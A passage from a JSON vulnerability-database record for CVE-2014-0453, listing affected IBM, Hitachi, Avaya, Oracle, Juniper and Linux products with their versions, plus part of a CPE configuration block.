"aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4.10" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0109-50" }, { "model": "websphere portal", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "jdk 1.6.0 01-b06", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "aura conferencing", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "jrockit r28.2.9", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "6" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "jdk 1.5.0.0 03", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.1" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "cosminexus developer standard 06-02-/g", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.27" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "cosminexus application server standard 06-00-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server enterprise (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "websphere portal", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.5" }, { "model": "rational developer for power systems software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.03" }, { "model": "java se embedded 7u51", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "cosminexus application server standard 06-02-/f", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli provisioning manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "tpf toolkit", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.6.5" }, { "model": "tivoli system automation for multiplatforms", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.1" }, { "model": "cosminexus developer professional 06-50-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.17" }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-60" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.40" }, { "model": "espace ivs v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "ucosminexus application server standard-r (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "ucosminexus application server standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "tivoli netview for z/os", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "ucosminexus operator )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "ucosminexus application server smart edition )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-50" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "jrockit r28.2.8", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "content foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.0" }, { "model": "jrockit r27.6.2", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "ucosminexus developer professional for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "ucosminexus developer light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "linux enterprise java sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "ucosminexus developer standard 06-70-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4" }, { "model": "tivoli key lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.1" }, { "model": "ucosminexus developer professional for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.1" }, { "model": "ucosminexus application server smart edition (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "sterling secure proxy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4.1.5" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.0" }, { "model": "cosminexus developer professional 06-02-/g", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server 05-05-/o", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "jrockit r27.6.9", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "sterling secure proxy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4.0.0" }, { "model": "websphere extreme scale", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "ucosminexus developer professional for plug-in", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.31" }, { "model": "ucosminexus primary server base )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "ucosminexus application server enterprise 06-70-/p", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "jrockit r27.6.3", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "cosminexus developer 05-00-/s", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server smart edition", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "tpf toolkit", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.6.2" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "soap gateway component of the ims enterprise suite", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "runtimes for java technology sr16-fp6", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.51" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.23" }, { "model": "junos space 13.1p1.14", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "smartcloud provisioning fp3 if0001", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.0" }, { "model": "network and security manager software 2012.2r9", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.071" }, { "model": "ucosminexus primary server base", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "linux enterprise server sp3 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.11" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.8" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.5.061" }, { "model": "cosminexus application server enterprise )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-02" }, { "model": "cosminexus developer 05-00-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cics transaction gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.41" }, { "model": "rational developer for power systems software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.62" }, { "model": "ucosminexus service platform messaging", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-09-50" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.7" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.1" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.12" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.3.1" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.177" }, { "model": "ucosminexus service architect", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-10" }, { "model": "ucosminexus developer standard", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-72" }, { "model": "ucosminexus service platform messaging (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-07-00" }, { "model": "jre 1.5.0 09", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "infosphere data replication dashboard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "rational synergy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1.2" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2" }, { "model": "hp-ux b.11.11", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.0" }, { "model": "cosminexus developer", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "05-02" }, { "model": "ucosminexus operator )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.6" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.32" }, { "model": "rational synergy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.7.003" }, { "model": "ucosminexus primary server base )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "tpf toolkit", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "ucosminexus application server enterprise 06-72-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server standard 06-50-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "network and security manager software r2", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "ucosminexus application server express )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "ucosminexus developer )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0109-00" }, { "model": "ucosminexus developer light )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "cosminexus client 06-50-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli system automation application manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "ucosminexus application server enterprise 06-71-/i", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.2.13" }, { "model": "ucosminexus application server standard-r", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.3" }, { "model": "ucosminexus client for plug-in )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1x8664" }, { "model": "cosminexus client 06-02-/g", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "tivoli netcool configuration manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "tivoli system automation application manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "tpf toolkit", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.6.4" }, { "model": "ucosminexus service platform messaging )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-07-10" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.3" }, { "model": "cosminexus studio 05-05-/r", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "jrockit r28.1.3", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "content analytics with enterprise search", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.51" }, { "model": "ucosminexus client 06-70-/a (windows(ip", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.112" }, { "model": "sterling secure proxy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4.1" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "tivoli netview for z/os", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "tpf toolkit", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.6.3" }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.1.1" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.13" }, { "model": "ucosminexus developer )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "0109-50" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.1" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.178" }, { "model": "messaging application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "ucosminexus application server light", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "omnifind enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "java se embedded 7u40", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "cosminexus client 06-00-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server enterprise 06-50-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "aura presence services sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "cosminexus primary server base 06-51-/n", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "systems director storage control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.3.2" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.5" }, { "model": "cosminexus application server standard )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-02" }, { "model": "runtimes for java technology sr16", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "cosminexus studio 05-00-/s", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer standard 06-70-/a (windows(ip", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.40" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5.2" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "ucosminexus application server express (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.3" }, { "model": "ucosminexus service platform messaging", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-09-00" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.9" }, { "model": "ucosminexus service platform messaging (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-08-00" }, { "model": "rational developer for power systems software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.01" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.53" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.34" }, { "model": "ucosminexus application server express", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "cosminexus application server 05-01-/l", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "linux enterprise server sp1 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "5" }, { "model": "sterling secure proxy", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.4.1.7" }, { "model": "cosminexus application server", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "05-02" }, { "model": "ucosminexus application server standard 06-72-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cics transaction gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "rational developer for power systems software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.8" }, { "model": "endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.14" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.051" }, { "model": "messagesight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "messagesight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0" }, { "model": "jdk 1.5.0 07-b03", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "cosminexus application server standard 06-51-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.051" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "ucosminexus developer light (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "rational developer for power systems software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.61" }, { "model": "security key lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.5" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.32" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.18" }, { "model": "websphere cast iron cloud integration", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.0.1" }, { "model": "cosminexus application server standard 06-51-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "sterling external authentication server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.1.1" }, { "model": "cosminexus application server enterprise 06-51-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "ucosminexus service platform messaging )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-08-20" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.145" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1" }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus client 06-72-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus service platform (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "ts7720 virtualization engine 3957-vea", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "ucosminexus service architect (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1.0" }, { "model": "rational developer for system z", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "cosminexus application server enterprise 06-51-/n", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "fabric manager", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "4.1.00.24" }, { "model": "ucosminexus application server smart edition )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "cosminexus primary server base 06-02-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "smartcloud provisioning fixpack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.31" }, { "model": "ucosminexus operator )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "vcenter update manager", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5" } ], "sources": [ { "db": "BID", "id": "66914" }, { "db": "JVNDB", "id": "JVNDB-2014-002089" }, { "db": "CNNVD", "id": "CNNVD-201404-268" }, { "db": "NVD", "id": "CVE-2014-0453" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r27.8.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r28.3.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:13.10:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:12.10:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:10.04:*:*:*:-:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:-:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:juniper:junos_space:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "15.1", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update51:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update51:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.8.0:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.8.0:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.5.0:update61:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update71:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.5.0:update61:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update71:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:ibm:forms_viewer:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "8.0.1.1", "versionStartIncluding": "8.0.0", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:ibm:forms_viewer:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "4.0.0.3", "versionStartIncluding": "4.0.0", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": 